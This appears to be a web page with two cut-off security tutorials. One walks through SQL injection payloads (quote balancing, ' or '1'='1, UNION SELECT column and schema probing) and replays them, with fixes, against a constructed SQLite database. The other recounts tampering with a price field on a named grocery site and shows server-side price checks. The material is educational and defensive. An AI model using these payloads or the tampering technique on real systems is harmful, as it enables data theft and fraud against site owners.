
SQL Injection: Starting from the Basics

Blocking Apostrophe: Values to Try

Find User or Parameter to Inject
  Name: Herp Derper
  # Try replacing a parameter value with a single quote (') or a double quote (") and see where the application throws an error.

Detect Filtering
  Name: Herp 'Derper
  # Submit the name value Herp 'Derper instead of Herp Derper.

Detect Vulnerability
  Once the vulnerability is detected (the point where the system throws an error), balance the query. The original query is:
    SELECT * FROM user WHERE name='$input';
  The single quote in our input leaves an unmatched quote in the statement, which is what causes the error, so we need to neutralize it. Our input becomes:
  Name: ' or '1'='1
  Isadmin: 2 - 1
  # For the numeric Isadmin field, 2 - 1 behaves exactly like 1 when the database evaluates the value, which shows that the field is not quoted.

Test for 1 Column Returned
  Name: Herp Derper
  Isadmin: 1 UNION SELECT Null #

Test for 2 Columns Returned
  Name: Herp Derper
  Isadmin: 1 UNION SELECT Null , Null #

Find Database Names
  Name: Herp Derper
  Isadmin: 1 UNION SELECT Null , table_schema FRO
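The probing sequence above, replayed end to end as an added example (this is not code from the original post). It builds a constructed SQLite database with the two fields the post uses, Name and Isadmin, sends each payload through a deliberately concatenated query, and shows the parameterized form beside it. Two SQLite differences from MySQL are assumed and noted inline: SQLite has no information_schema, so sqlite_master stands in for the table_schema lookup, and SQLite does not treat # as a comment, so the payloads end in -- instead.

```python
import sqlite3

# Added example, not the post's code. Replays the tutorial's SQL injection
# steps against a constructed in-memory SQLite database.


def make_db():
    """Constructed sample data: two users plus an unrelated table to exfiltrate."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user (name TEXT, isadmin INTEGER)")
    con.executemany("INSERT INTO user VALUES (?, ?)",
                    [("Herp Derper", 0), ("admin", 1)])
    con.execute("CREATE TABLE secret (note TEXT)")
    con.execute("INSERT INTO secret VALUES ('constructed-secret')")
    con.commit()
    return con


def vulnerable_by_name(con, name):
    """Quoted string parameter built by concatenation, exactly like the post's
    SELECT * FROM user WHERE name='$input'. Deliberately injectable."""
    sql = f"SELECT name, isadmin FROM user WHERE name='{name}'"
    return con.execute(sql).fetchall()


def vulnerable_by_isadmin(con, isadmin):
    """Unquoted numeric parameter (the post's Isadmin field). Deliberately injectable."""
    sql = f"SELECT name, isadmin FROM user WHERE isadmin={isadmin}"
    return con.execute(sql).fetchall()


def probe(con, lookup, payload):
    """Send one payload through a lookup and return the rows, or 'error' when the
    database rejects the statement (the signal the first two steps look for)."""
    try:
        return lookup(con, payload)
    except sqlite3.Error:
        return "error"


def safe_by_name(con, name):
    """Hardened form: the value is bound as a parameter, never spliced into SQL text."""
    return con.execute("SELECT name, isadmin FROM user WHERE name=?", (name,)).fetchall()


def safe_by_isadmin(con, isadmin):
    """Hardened form for the numeric field; a string payload simply fails to match."""
    return con.execute("SELECT name, isadmin FROM user WHERE isadmin=?", (isadmin,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # SQLite has no information_schema; sqlite_master plays the role of
    # information_schema.tables here. '-- ' replaces MySQL's '#' comment.
    steps = [
        ("detect filtering (stray quote)", vulnerable_by_name, "Herp 'Derper"),
        ("balance the quote", vulnerable_by_name, "' or '1'='1"),
        ("numeric field evaluates 2-1", vulnerable_by_isadmin, "2-1"),
        ("test for 1 column", vulnerable_by_isadmin, "1 UNION SELECT NULL -- "),
        ("test for 2 columns", vulnerable_by_isadmin, "1 UNION SELECT NULL, NULL -- "),
        ("find table names", vulnerable_by_isadmin,
         "1 UNION SELECT NULL, name FROM sqlite_master WHERE type='table' -- "),
        ("dump another table", vulnerable_by_isadmin, "1 UNION SELECT NULL, note FROM secret -- "),
    ]
    for label, fn, payload in steps:
        print(f"{label:32} {payload!r:72} -> {probe(db, fn, payload)}")
    print("parameterized:", safe_by_name(db, "' or '1'='1"),
          safe_by_isadmin(db, "1 UNION SELECT NULL, NULL -- "))
```

The one-column UNION fails with a column-count error and the two-column one succeeds, which is how the column count is learned; once a second column can carry text, it is reused to pull table names and then rows from another table. With bound parameters the same payloads return nothing because they are compared as literal values.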

BrownBag.in Bugs (Parameter Tampering, XSS, Stored XSS)

During the COVID-19 pandemic there was a surge in online grocery stores. So it intrigued me, and I started searching for websites that deliver in my zone, and guess what! I found BrownBag.in. So I built an account on it and tried to order something. You know what happened then: I ordered a product worth 750 for just 1 rupee. Now we are going to learn how that happens. In security terms it is known as parameter tampering. So let's learn what parameter tampering is: the Web Parameter Tampering attack is based on the manipulation of parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, etc. Usually, this information is stored in cookies, hidden form fields, or URL query strings, and is used to increase application functionality and control. This attack can be performed by a malicious user who wants to exploit the application for their own benefit, or an attacker who wishe
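The price-tampering pattern described above, as an added example that is not BrownBag.in's code and not part of the original post: a checkout handler that trusts a price field sent by the client is placed beside one that takes the price only from a server-side catalog and validates the quantity. The product catalog, product ids and form bodies are constructed for the example.

```python
from urllib.parse import parse_qs

# Added example, not the site's code. Constructed catalog:
# product id -> unit price in rupees.
CATALOG = {"rice-5kg": 750, "salt-1kg": 20}

# Constructed form bodies as a browser would POST them. A hidden 'price'
# field is exactly what the page says gets tampered with.
HONEST = "product=rice-5kg&qty=1&price=750"
TAMPERED = "product=rice-5kg&qty=1&price=1"


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body into single values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def checkout_vulnerable(body):
    """Trusts the client-supplied price: the pattern behind a 750 -> 1 rupee order."""
    form = parse_form(body)
    qty = int(form["qty"])
    price = int(form["price"])  # attacker-controlled hidden field
    return {"product": form["product"], "total": qty * price}


def checkout_fixed(body):
    """Price comes only from the server-side catalog; quantity is type-checked and
    bounded; any price field the client sends is ignored entirely."""
    form = parse_form(body)
    product = form.get("product")
    if product not in CATALOG:
        raise ValueError("unknown product")
    try:
        qty = int(form.get("qty", ""))
    except ValueError:
        raise ValueError("quantity must be an integer")
    if not 1 <= qty <= 100:
        raise ValueError("quantity out of range")
    return {"product": product, "total": qty * CATALOG[product]}


def rejected(body):
    """True when the hardened handler refuses the order."""
    try:
        checkout_fixed(body)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    print("vulnerable, tampered:", checkout_vulnerable(TAMPERED))
    print("fixed, tampered:     ", checkout_fixed(TAMPERED))
    print("fixed, qty=-1 rejected:", rejected("product=rice-5kg&qty=-1&price=750"))
```

The fix is not to hide the field better; anything the browser sends can be edited in a proxy. The server has to recompute every security-relevant value (price, discount, role) from data it owns and treat client fields as untrusted input.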